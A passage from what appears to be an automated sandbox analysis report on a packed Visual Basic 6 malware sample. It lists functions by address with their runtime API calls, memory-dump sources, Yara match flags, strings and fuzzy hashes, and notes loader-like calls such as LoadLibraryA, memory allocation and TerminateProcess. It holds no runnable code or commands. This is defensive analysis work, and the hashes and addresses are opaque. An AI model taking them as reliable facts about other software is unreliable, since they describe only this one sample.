                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403168,00000078), ref: 0041D3BB
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0), ref: 0041D3E1
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,0000001C), ref: 0041D446
                                                                                                    • __vbaChkstk.MSVBVM60(00000000,?,00403098,0000001C), ref: 0041D47D
                                                                                                    • __vbaCastObj.MSVBVM60(?,004031B8), ref: 0041D499
                                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,004031B8), ref: 0041D4A6
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403140,00000058), ref: 0041D4E1
                                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041D505
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402DA4,000006F8), ref: 0041D5A4
                                                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,00402DA4,000006F8), ref: 0041D5BE
                                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D63B
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D643
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D64B
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D653
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D65B
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D663
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D66B
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,0041D6A0), ref: 0041D673
                                                                                                    • __vbaRecDestruct.MSVBVM60(00402E6C,?,00402E6C,?,0041D6A0), ref: 0041D684
                                                                                                    • __vbaFreeObj.MSVBVM60(00402E6C,?,00402E6C,?,0041D6A0), ref: 0041D68F
                                                                                                    • __vbaFreeStr.MSVBVM60(00402E6C,?,00402E6C,?,0041D6A0), ref: 0041D69A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$CheckHresult$Move$AnsiNew2$ErrorList$System$ChkstkDestruct$Copy$#536#541#573#598#611#613#685#703Cast
                                                                                                    • String ID: $$4:4$ANDREWARTHA$Contangoes3$Dorosoma5$K$Lstes8$iliau$stretchier$thyroidization
                                                                                                    • API String ID: 1936441329-1455819464
                                                                                                    • Opcode ID: 06c46a5d765d79e45e0e0217a5762b33ac96eac676a9a8b8dd0365ab4fbd747d
                                                                                                    • Instruction ID: 58b7c90cdda32a6d3079ebd954192ab64e50e018f6d4a2c769da0ed824d22d55
                                                                                                    • Opcode Fuzzy Hash: 06c46a5d765d79e45e0e0217a5762b33ac96eac676a9a8b8dd0365ab4fbd747d
                                                                                                    • Instruction Fuzzy Hash: DA92E371940228AFDB61DF60CC49BDDB7B5AF09305F1040EAE50DBA2A1DB785BC88F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D6BF, Relevance: 54.4, APIs: 28, Strings: 3, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041D6DA
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 0041D6F2
                                                                                                    • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D711
                                                                                                    • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D71B
                                                                                                    • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D723
                                                                                                    • __vbaVarDup.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D73C
                                                                                                    • #591.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D745
                                                                                                    • __vbaStrMove.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D74F
                                                                                                    • __vbaStrCat.MSVBVM60(004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D75F
                                                                                                    • __vbaStrMove.MSVBVM60(004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D769
                                                                                                    • __vbaStrCat.MSVBVM60(004031F8,00000000,004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D774
                                                                                                    • __vbaStrMove.MSVBVM60(004031F8,00000000,004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D77E
                                                                                                    • __vbaStrCmp.MSVBVM60(00000000,004031F8,00000000,004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D784
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,004031F8,00000000,004031EC,Str,00000000,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D7A3
                                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041D7AE
                                                                                                    • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D7D9
                                                                                                    • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D7E3
                                                                                                    • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D7EB
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D803
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,00000014,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D847
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000060,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D882
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D8A0
                                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D8A8
                                                                                                    • #570.MSVBVM60(000000E5,?,?,?,?,?,?,?,?,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041D8B2
                                                                                                    • __vbaFreeStr.MSVBVM60(0041D917,?,?,?,00401216), ref: 0041D8F9
                                                                                                    • __vbaFreeStr.MSVBVM60(0041D917,?,?,?,00401216), ref: 0041D901
                                                                                                    • __vbaFreeStr.MSVBVM60(0041D917,?,?,?,00401216), ref: 0041D909
                                                                                                    • __vbaFreeStr.MSVBVM60(0041D917,?,?,?,00401216), ref: 0041D911
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$#703CheckHresult$#570#591ChkstkCopyListNew2
                                                                                                    • String ID: @."&$PRESSIE$Str
                                                                                                    • API String ID: 4270550733-397218167
                                                                                                    • Opcode ID: 323f8385c5bd541559963ce3fb04651fe3f9c75b1170750b9f92fec495a6bac7
                                                                                                    • Instruction ID: ac755ba2acf17e9ff4ea00b6dbc6a4fde0d2c34e7b87736aeaf81ce23aa240cf
                                                                                                    • Opcode Fuzzy Hash: 323f8385c5bd541559963ce3fb04651fe3f9c75b1170750b9f92fec495a6bac7
                                                                                                    • Instruction Fuzzy Hash: 3361FA71D0020DABDF04EFA5C846ADEBBB9BF04314F20422AF425BB5E1DB785A45CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041DA6E, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041DA89
                                                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401216), ref: 0041DAA2
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D74,00000058), ref: 0041DACE
                                                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041DAE9
                                                                                                    • #644.MSVBVM60(?,?,?), ref: 0041DAF2
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0041DB03
                                                                                                    • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0041DB42
                                                                                                    • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0041DB53
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D74,000002B0), ref: 0041DB8A
                                                                                                    • __vbaFreeObj.MSVBVM60(0041DBB1), ref: 0041DBAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                                                                                                    • String ID:
                                                                                                    • API String ID: 1032928638-0
                                                                                                    • Opcode ID: db3026a67357c8432eb3826c087588ba0628992192fb6560b8f30183e5d20366
                                                                                                    • Instruction ID: be029e28d27d6308d8f20e4f6303928863de62fc02472ecafc926870af66d1de
                                                                                                    • Opcode Fuzzy Hash: db3026a67357c8432eb3826c087588ba0628992192fb6560b8f30183e5d20366
                                                                                                    • Instruction Fuzzy Hash: 9541E6B1C40608AFDF01EFA1C846BDEBBB5FF05344F10442AF501BA1A1D7BDA9869B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D938, Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041D954
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,004011E8,00402D74,000002B4), ref: 0041D9A7
                                                                                                    • __vbaVarMove.MSVBVM60(00000000,004011E8,00402D74,000002B4), ref: 0041D9CE
                                                                                                    • __vbaVarMove.MSVBVM60(00000000,004011E8,00402D74,000002B4), ref: 0041D9E7
                                                                                                    • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D9F8
                                                                                                    • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D9FE
                                                                                                    • __vbaFreeVar.MSVBVM60(0041DA45), ref: 0041DA37
                                                                                                    • __vbaFreeVar.MSVBVM60(0041DA45), ref: 0041DA3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: __vba$FreeMove$CheckChkstkHresultIdiv
                                                                                                    • String ID:
                                                                                                    • API String ID: 3577542843-0
                                                                                                    • Opcode ID: b7f5c357ca36e6d25ee7f65d5ce3839c90fcb6b6cb7fe6b21e593508e45db5d2
                                                                                                    • Instruction ID: 8d0e74c0eb43c6f6e8e0c49a9d8fa13cbe82c45ebdce5aede003ab6d4baaa3bb
                                                                                                    • Opcode Fuzzy Hash: b7f5c357ca36e6d25ee7f65d5ce3839c90fcb6b6cb7fe6b21e593508e45db5d2
                                                                                                    • Instruction Fuzzy Hash: B031B4B1900208AFDB00EFA5C989FDDBBB4AF04744F10456AF509BB1A1D779AA45CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004013B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: #100
                                                                                                    • String ID: VB5!6&*
                                                                                                    • API String ID: 1341478452-3593831657
                                                                                                    • Opcode ID: 2db6bf30035ccf2bd57268446418847ed0ae491b1e7d2731402f50a9bf1e6c1d
                                                                                                    • Instruction ID: c82bd793577bf97f490cc4b2fc066edfcddd10ba761cb3162abbcc0b2933dcf0
                                                                                                    • Opcode Fuzzy Hash: 2db6bf30035ccf2bd57268446418847ed0ae491b1e7d2731402f50a9bf1e6c1d
                                                                                                    • Instruction Fuzzy Hash: F331CCA188E3C15FE70757B49D252953FB0AF43228B0A82EBC491DF1F7D66D084AD726
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 023020DC, Relevance: 1.8, APIs: 1, Instructions: 318libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(FEA7A63B), ref: 02302245
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 8552969b403df588a1bf08f4dbabf7ac070821d753747a1412fc6a775e923bc2
                                                                                                    • Instruction ID: 4ba52f367d11bd2482eafbb8bafef2b87ab7f85224b8d83f7ca056e5371c7e97
                                                                                                    • Opcode Fuzzy Hash: 8552969b403df588a1bf08f4dbabf7ac070821d753747a1412fc6a775e923bc2
                                                                                                    • Instruction Fuzzy Hash: F09185712D926EEBCB61EE249CC55AAFB94DA0A2317648369DC359B8D7C722C40EC740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022F17DD, Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1129996299-0
                                                                                                    • Opcode ID: 925f481709e8773ca988ceb73b51520a7fa83d0dd0dde5f52fcaa7f1ab24cb3b
                                                                                                    • Instruction ID: 44617fd027a169b803caf78f5362eda04288a57c0e2851f5d97fdbf7c7311c9e
                                                                                                    • Opcode Fuzzy Hash: 925f481709e8773ca988ceb73b51520a7fa83d0dd0dde5f52fcaa7f1ab24cb3b
                                                                                                    • Instruction Fuzzy Hash: 4D81083119925EDFC721EE798CC45A9FBA0DB1A230B24476AD9749B9D7C732C40AC740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FD1DC, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateCreateFileMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2773895085-0
                                                                                                    • Opcode ID: 594cd7fdcdc13dc383eef53dd6517babf16a9915892e8285311120cd69312825
                                                                                                    • Instruction ID: 01278957b3b0b4e8ea054b2d8552010e99db97a39ddff1225671bc0233f2311b
                                                                                                    • Opcode Fuzzy Hash: 594cd7fdcdc13dc383eef53dd6517babf16a9915892e8285311120cd69312825
                                                                                                    • Instruction Fuzzy Hash: 5B5151712E956EEBCB70ED289CC1AAAFB94DB1A2717644376DC319F5D7C722C409C204
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022F4064, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateProcess.KERNELBASE(63541DC6), ref: 022FD0B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 560597551-0
                                                                                                    • Opcode ID: efd786e141a82d31ed1351c937e25f38093ef6191c24f58f0b2c2dbacd8464ab
                                                                                                    • Instruction ID: d2a9bbfb79f020ad42d298a31f03547e580ce4cdd5348d74c9578be0cb43ea21
                                                                                                    • Opcode Fuzzy Hash: efd786e141a82d31ed1351c937e25f38093ef6191c24f58f0b2c2dbacd8464ab
                                                                                                    • Instruction Fuzzy Hash: F4E02273C29221CBCBE14FA0C804BEEF260AF05B65F16413E9C44B7004C6B00CD0CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 022FE1B9, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID: ];~O
                                                                                                    • API String ID: 1029625771-1740769899
                                                                                                    • Opcode ID: 986384a851451be29b19952eea5dafa4a5bc0e0f0acb55558377bcd3dc40c682
                                                                                                    • Instruction ID: 892d5b6fca18163d937c0a7a90893756fc604b1b1981ab11b131efebc19c4f5a
                                                                                                    • Opcode Fuzzy Hash: 986384a851451be29b19952eea5dafa4a5bc0e0f0acb55558377bcd3dc40c682
                                                                                                    • Instruction Fuzzy Hash: 05A1BD7151438ADFDBB59EA4CC91BEE77B2BF15340F024429DD8A9B268E7314681CF12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022F9E10, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (y6
                                                                                                    • API String ID: 0-742801672
                                                                                                    • Opcode ID: 075e34cb7414ca1ed479878d9a85a2a25ea87ce0b31bbc19e375589ec77b4818
                                                                                                    • Instruction ID: d7a5cfd57cfa37cdcfcee2965f155d1119a406e5f04a13c7a802abd471cdaf8e
                                                                                                    • Opcode Fuzzy Hash: 075e34cb7414ca1ed479878d9a85a2a25ea87ce0b31bbc19e375589ec77b4818
                                                                                                    • Instruction Fuzzy Hash: 3851F0B1514305DFC7689F28C885BEAB7E5FF08310F42429ADC5ADB2A1D3349981CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FA561, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6<
                                                                                                    • API String ID: 0-4005132889
                                                                                                    • Opcode ID: 8d1cda31f124fdd6b5e0410858ed347f8782b3729038df039665dcefbe316b72
                                                                                                    • Instruction ID: 9500d89409f1a092d026942a308304415dd4423bfa85a4b08e7b97ab4133752d
                                                                                                    • Opcode Fuzzy Hash: 8d1cda31f124fdd6b5e0410858ed347f8782b3729038df039665dcefbe316b72
                                                                                                    • Instruction Fuzzy Hash: 66510331614746CFDBB0CE66DA912E6B6E2AF88700F55423FCE8E5B608C3346A01CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 023030BF, Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8Q
                                                                                                    • API String ID: 0-1436772169
                                                                                                    • Opcode ID: 6e01908da38246fe02a1aa732c4be2d73c6560675b12008a7d360ca69493edae
                                                                                                    • Instruction ID: eae377c951993251818129e6aae9ea7f3f16fda94cfa019e21e0b3f7c6a4a327
                                                                                                    • Opcode Fuzzy Hash: 6e01908da38246fe02a1aa732c4be2d73c6560675b12008a7d360ca69493edae
                                                                                                    • Instruction Fuzzy Hash: EA210372B04384DBEB3C9E26DDE47EA32A7AFD9310F55816F9C0E4B295C73046478A25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022F10DE, Relevance: .2, Instructions: 237COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d159c00116b4570db599f8b8df427defd3295464081aa5d785285d006e03dd3f
                                                                                                    • Instruction ID: 2f8c825a6287853a1d204683e2734347a979ee5f7f752e8bd902739eca2385f7
                                                                                                    • Opcode Fuzzy Hash: d159c00116b4570db599f8b8df427defd3295464081aa5d785285d006e03dd3f
                                                                                                    • Instruction Fuzzy Hash: 12617D7129826BDFC711EE758CC15AAFFE4EE5A220B2447ADC5919F8E7C721840BC781
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401535, Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                                                    • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                                                                                                    • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                                                    • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FA1E8, Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9fd922552f83ce7c049e7015c955a50ddcc203bc25c87b72c9b278bdb57eaf5a
                                                                                                    • Instruction ID: ca0824dda073864235f91d33de49f7c6693e4107d77d6b3269e5fb222a0a216b
                                                                                                    • Opcode Fuzzy Hash: 9fd922552f83ce7c049e7015c955a50ddcc203bc25c87b72c9b278bdb57eaf5a
                                                                                                    • Instruction Fuzzy Hash: E731E5701187C18BDF75CEBCD995B96BB91AB56218F0882BECC9E4A2DFD7314106C342
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401771, Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                                                    • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                                                                                                    • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                                                    • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02302CF6, Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fbfdadc1d5f8e6130a9847ef6dcf353dfb158e8513e0f8c7f19a8788eeb98c79
                                                                                                    • Instruction ID: 80117233a2c8b6e4090d38a5fed23b27bdf162b1dc464032892f9ee3d7e6ff14
                                                                                                    • Opcode Fuzzy Hash: fbfdadc1d5f8e6130a9847ef6dcf353dfb158e8513e0f8c7f19a8788eeb98c79
                                                                                                    • Instruction Fuzzy Hash: F3010075214288CFCB24CF28C8DCB9A73A0AB19200F05446AEC18CB762D730EE44CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401724, Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80791127085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.80791108005.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791253131.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000000.00000002.80791273420.0000000000421000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                                                    • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                                                                                                    • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                                                    • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0230377C, Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
